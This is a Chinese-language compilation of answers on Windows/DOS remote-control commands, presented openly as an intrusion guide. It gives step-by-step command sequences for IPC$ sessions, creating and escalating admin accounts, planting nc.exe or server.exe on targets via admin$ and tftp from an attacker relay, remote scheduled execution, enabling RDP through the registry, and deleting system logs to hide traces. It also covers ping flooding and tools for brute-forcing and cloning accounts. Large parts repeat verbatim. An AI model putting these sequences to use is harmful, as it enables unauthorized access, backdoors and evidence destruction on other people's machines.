dos遠程式控制制命令

『壹』 有關遠程式控制制的DOS命令

DOS命令字典(收藏)
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IPput c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中

『貳』 DOS遠程式控制制的命令

控制台下的吧
命令:telnet
用途:使用telnet服務登入遠程主機。
語法:telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]
參數:
-a
企圖自動登錄。除了用當前已登陸的用戶名以外，與 -l 選項相同。
-e
跳過字元來進入 telnet 客戶提示。
-f
客戶端登錄的文件名
-l
指定遠程系統上登錄用的用戶名稱。
要求遠程系統支持 TELNET ENVIRON 選項。
-t
指定終端類型。
支持的終端類型僅是: vt100, vt52, ansi 和 vtnt。
host
指定要連接的遠程計算機的主機名或 IP 地址。
port
指定埠號或服務名。

telnet的主要內部命令:
Close：該命令用語終止連接。
它自動切斷與遠程系統的連接，也可以用它退出Telnet，
在冒失的進入一個網路主機時，想退出的話，就可以用到這個命令。
open：用它來與一個命名機器連接，要求給出目標機器的名字或IP地址。
如果未給出機器名，Telnet就將要你選擇一個機器名。
必須注意，在使用"Open"命令之前應該先用"close"來關閉任何已經存在的連接。
Set ECHO：用於本地的響應是On或是Off。
作用是是否把輸出的內容顯示在屏幕上。和DOS的ECHO基本上是一樣。
如果機器是處於ECHO ON的話，想改變為OFF，那麼就可以輸入SET ECHO,想再改變回ECHO OFF，
那麼就再鍵入SET ECHO就可以了。
Set escape char:建立"escape"字元到某個特殊的符號，若想用某種控制符號來代替，
可以用"asis"或者鍵入符號"^"加字母b(如：^b）。
在正常工作時，是不需要用"escape"這個字元的，並且這個被用作"escape"的符號不應該再被使用。
這類似於許多程序中對鍵盤上的每一個鍵設定其真正的涵義。
但如果正在運行一個 daisy-chained 應用系統，那麼可以重新議定"escape"字元的特徵便是很有用的。
例如：用Telnet從系統A到系統B，接著又用Telnet注冊進入系統C。
如果正在系統C上工作時出了故障，那麼當"escape"代表符是相同時，就沒法中斷系統B到系統C的連接。
鍵入"escape"代表符，將總是處於系統A的命令模式。
如果在每個Telnet部分使用不同的"escape"代表符，便可以通過鍵入適當的符號，
來選擇其中一個命令模式，這也可以用於其他的應用中（像終端模擬）。
Quit:用它可順利地推出Telnet程序。
Z:用語保留Telnet但暫時回到本地系統執行其他命令。
並且在Telnet中的連接以及其他的選擇在Telnet恢復時仍被保留。
Carriage Return:用於不具體的一個命令從命令模式返回到所連接的遠程機器上。
另外，還有許多其他的命令可以推出命令模式。

『叄』 求DOS 開啟遠程桌面 的命令。

第一步：
net user username /active :yes（激活一個賬號）
net user username password（設定賬號密碼）
net user username password /add（添加一個賬號）
net localgroup localgroupname username /add（添加賬號到某個組）

第二步：
主機IP: 比如192.168.0.88
已有的帳號和密碼:（第一步你建的）wawa/7788
首先與遠程主機建立連接
net use \\192.168.0.1\ipc$ "7788 " /user: "wawa "
再打開本機注冊表
"開始 "==> "運行 "==> regedit
在 "注冊表 "下拉菜單中選擇 "連接網路注冊表 "
在 "計算機名 "中輸入 \\192.168.0.88
這樣就進入了 遠程主機 注冊表.
現在我們找到這里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
將fEnableWinStation值由0改為1
SQLEXEC或telnet進入後,檢查終端組件是否安裝:
c:\> query user
這個工具需要安裝終端服務.
這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
> w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.
好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\> dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 位元組
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 位元組
-----------------------------------------------------
c:\> echo [Components] > c:\wawa
c:\> echo TSEnable = on > > c:\wawa
//這是建立無人參與的安裝參數
c:\> type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\> sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

『肆』 用dos通過命令怎麼打開遠程式控制制

開始-運行：mstsc 輸入對方IP，需要知道用戶名和密碼

『伍』 DOS情況下的遠程連接命令是什麼

DOS網路命令
遠程登錄命令：telnet
文件上傳下載：FTP
顯示和修改本地ARP列表：ARP
顯示和修改本地路由器命令：Route
還有Ipconfig/Winipcfg，Getmac,Nbtstat,Netstat，Ping，Tracert，Netsh，Net等

telnet
要看幫助的話鍵入telnet /？，不支持help telnet
其它詳細命令請看：
1. net user admin godmour /add 新建一個用戶名為 admin 密碼為 godmour 默認為user組成員
2. net user admin /del 將用戶名為admin的用戶刪除
3. net user admin /active:no 將用戶admin禁用
4. net user admin /active:yes 將用戶admin激活
5. net user admin 查看擁護admin用戶的情況
6. net localgroup administratros admin /add 提升用戶許可權
7. net view \\IP 查看遠程主機共享資源
8. net use x:\\IP\sharename 遠程影射本地盤符 Z （建立連接 net use \\IP\IPC$"password" /user:"name")
9. net user admin godmour 把admin的密碼修改成 godmour
10. net start servername 啟動 telnet 服務
net start servername 停止 telnet 服務tracert 61.144.56.101 查看路由是否正常工作
netstat命令
netstat [-r] [-s] [-n] [-a]。
當然，你也可以利用「netstat /?」命令來查看一下該命令的使用格式以及詳細的參數說明
netstat參數含義如下
-r 顯示本機路由表的內容
-s 顯示每個協議的使用狀態（包括TCP協議、UDP協議、IP協議）
-n 以數字表格形式顯示地址和埠
-a 顯示所有主機的埠號
運行Netstat -a命令將顯示計算機上網時與外部之間的所有連接，計算機埠與外部的連接情況等；而Netstat
-s命令則顯示電腦網路連接協議的統計信息。這樣你就可以看到當前你的電腦上網路在進行哪些連接，數據包發
送和接收的詳細情況等等

『陸』 如何通過dos 命令連接遠程主機，連接後怎麼控制

常用的DOS命令建立到遠程主機的連接
net use \\ip\ipc$ "password"
/user:"username"
建立新用戶
net user username password /add
修改用戶密碼
net
user username newpassword
激活用戶
net user username
/active:yes
把用戶加入到用戶組
net localgroup groupname username
/add
查看遠程主機的時間
net time \\ip
顯示遠程主機的共享資源列表
net view
\\ip
啟動和停止系統服務
net start(stop) servicename
映射對方的硬碟
net use z:
\\ip\c$
啟動程序
at \\ip time programnane
文件復制
filename
\\ip\c$\filename
遠程執行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
刪除日誌
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt

del c:\winnt\*.log
訪問對方共享資源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示連接成功,你在輸入
start \\192.168.1.1\c$

就打開目標機的C盤了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use
h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$
登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del
刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes
激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup
administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net
start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)

net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set
設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net
view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net
pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息

net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del
刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345
用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a
查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v
查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）

netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip
對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數
ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名)
向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows
NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t
以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名
加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR
*.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二：
del /S /Q 目錄
或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）

move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc
one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >"
是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at
id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠
遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet
將進入本機的telnet
路徑\文件名1路徑\文件名2 /y
復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$
復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件

\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.*
復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹目標地址\目錄名
復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe
c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe
參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IPput
c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠
用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route
print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway
addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp
-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem
查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir
查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、
time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set
指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元)
顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if
在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽
將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名
從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）

echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo
信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值
設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白

prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )
139埠入侵
net
命令是139埠入侵的重中之重，整個入侵過程會多次用到它。在命令行窗口下輸入net，可以看到有一大堆參數，別被這一大堆參數嚇懷了，現在我來為你一一講解。
net
use
net use
命令用於與遠程主機建立IPC$(管理)連接，當你有遠程計算機的用戶名(通常用戶名為administrator,記住它)和密碼時，在命令行窗口下輸入net
use\\IP\IPC$"password"/user:administrator，你就成功地建立了與遠程計算機的連接。在這之後，可以對其進行管理了。net
use 還有一個用處，即映射遠程機器的共享資源，輸入net use z: \\IP\C$
(注意！在此之後的一切命令都是基於第一個命令的，也就是說必須先建立IPC$連接後，這些命令才會成功)，打開「我的電腦」，你會發現多了一個Z盤，裡面全是遠程主機C盤下的東西，你在Z盤里刪除了一個文件，對方C盤下的這個文件就也被刪除了，所有對Z盤的操作其實就是對遠程計算機的C
盤的操作。怎麼樣，是不是很有意思呢？
net view
net view 用於查看遠程計算機有哪些共享資源，通常你會看到my
document之類的共享文件夾，輸入net view \\IP即可。我個人認為net view
沒有太大用處，要知道，在Windows2000中，各個硬碟都是共享的，但是如果你用net view 來查看，你會發現並無C,D,E
之類的共享資源。這是為什麼呢？注意，在這之前的一些命令中，我們曾輸入過IPC$,C$這樣的奇怪東西，其實，Windows2000中，帶"$"後綴的共享資源是隱藏的，在命令行窗口下是無法看到的，Windows2000中各個盤都是以諸如C$,D$,E$
這樣的名稱共享的，所以我們看不到，但確實存在，IPC$也是如此。
net share
net share 用於開放共享，輸入net
share QQ=c:\tencent，你會發現多了一個名為QQ的共享資源。這個命令有慎么作用呢？假設一個主機安全做的不錯，關閉了IPC$,C$,D$
等共享，那麼我們就無法在139埠上建立管理連接，也無法訪問對方的C盤，當我們通過別的手段進入後(如遠程溢出)，我們就可以用net share
開放IPC$，從而轉為熟悉的139埠的入侵，開放IPC$ 的命令為net share IPC$。相應的，如果你想關閉共享，你可以加上/del 後綴，例如net
share c$ /del 就關閉了C盤的共享。
net user
net user 命令用於管理主機上的用戶，僅輸入不帶任何參數的net
user 會列出計算機上所有的用戶名。現在就讓我們看看net user
命令是如何對用戶進行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一個名為hacker，密碼為12345的用戶。
┃
┃ net user hacker /del
刪除名為hacker的用戶。┃
┃ net user hacker
/active:no 禁用hacker這個用戶，這個用戶不能再登陸此計算機。┃
┃ net user hacker
/active:yes 激活已禁用的hacker這個用戶。 ┃
┃ net localgroup
administrator hacker /add 把hacker這個用戶添加進管理員組，即提升hacker的許可權，使之變為管理員 ┃

┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用於起動/停止系統服務，通常我們會net stop w3svc
(停止網頁服務)，然後替換網頁，對此命令我不多講，知道即可。
*at 命令，net
time
之所以把它們放在一起來講，是因為at命令要用到net time命令的結果，一般我們先 net view
\\ip,得到遠程主機的時間(假設得到的時間為9:00)，然後at \\ip 9:00 telnet
就啟動了telnet服務，at這個命令就是用來遠程運行程序的.
(5)需要准備的工具
肉雞獵手v1.0掃描一個網段，找出弱密碼的計算機
SMBCrack
針對特定主機，暴力猜解密碼
DameWare Mini Remote Control監控運程屏幕
CA.exe
克隆管理員賬號

『柒』 DOS怎麼遠程式控制制

一，ping

它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了（下同）。

-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。

-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。

-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。

說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如「ping IP -t -n 3」，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。

下面我們舉個例子來說明一下具體用法。

這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小 。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說「初步判斷」是因為這個值是可以修改的。這里TTL=32表示操作系統可能是win98。

（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）

至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。

二，nbtstat

該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。

-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。

-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。

-n 列出本地機器的NETBIOS信息。

當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。

三，netstat

這是一個用來查看網路狀態的命令，操作簡便功能強大。

-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息，如圖4。

這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。

-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。

四，tracert

跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。如圖5。

這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。

五，net

這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車如圖6。

在這里，我們重點掌握幾個入侵常用的子命令。

net view

使用此命令查看遠程主機的所以共享資源。命令格式為net view \IP

net use

把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: \IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7 建立IPC$連接（net use \IP\IPC$ "password" /user:"name"），

建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe \192.168.0.7\admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。

net start

使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。

net stop

入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦？利用這個命令停掉就ok了，用法和net start同。

net user

查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。

1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。

2，net user abcd /del，將用戶名為abcd的用戶刪除。

3，net user abcd /active:no，將用戶名為abcd的用戶禁用。

4，net user abcd /active:yes，激活用戶名為abcd的用戶。

5，net user abcd，查看用戶名為abcd的用戶的情況

net localgroup

查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。

現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。

net time

這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（後面會講到）可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time \IP。

六，at

這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間（比如2分鍾後）執行某個程序和命令。用法：at time command \computer。

